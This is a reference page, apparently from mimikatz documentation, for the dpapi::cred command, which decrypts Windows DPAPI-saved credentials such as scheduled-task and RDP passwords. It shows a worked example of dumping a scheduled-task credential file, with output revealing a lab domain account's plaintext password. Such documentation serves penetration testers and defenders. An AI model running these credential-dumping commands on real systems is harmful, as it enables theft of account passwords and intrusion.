cred

dpapi::cred decrypts DPAPI saved credential such as RDP, Scheduled tasks, etc (cf. dumping DPAPI secrets). It has the following command line arguments:

The following example was taken from Benjamin's howto ~ scheduled tasks credentials guide, which displays the content of the credential file:

mimikatz # dpapi::cred /in:%systemroot%\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\AA10EB8126AA20883E9542812A0F904C
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {5d4e7e0d-d922-4783-8efc-9319b45b1c9a}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 00000046 - 70
  szDescription      : Données d’identification locales
[...]
Decrypting Credential:
 * volatile cache: GUID:{5d4e7e0d-d922-4783-8efc-9319b45b1c9a};KeyHash:ba02ef86f26c683858d3df3dc961e37b0d47e574
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000fe - 254
  credUnk0       : 00004004 - 16388

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 03/01/2017 21:31:30
  unkFlagsOrSize : 00000018 - 24
  Persist        : 00000002 - 2 - local_machine
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:batch=TaskScheduler:Task:{813565C4-C976-4E78-A1CA-8BDAE749E965}
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : LAB\\admin
  CredentialBlob : waza1234/a
  Attributes     : 0
Previouscreate 🛠️Nextcredhist

Last updated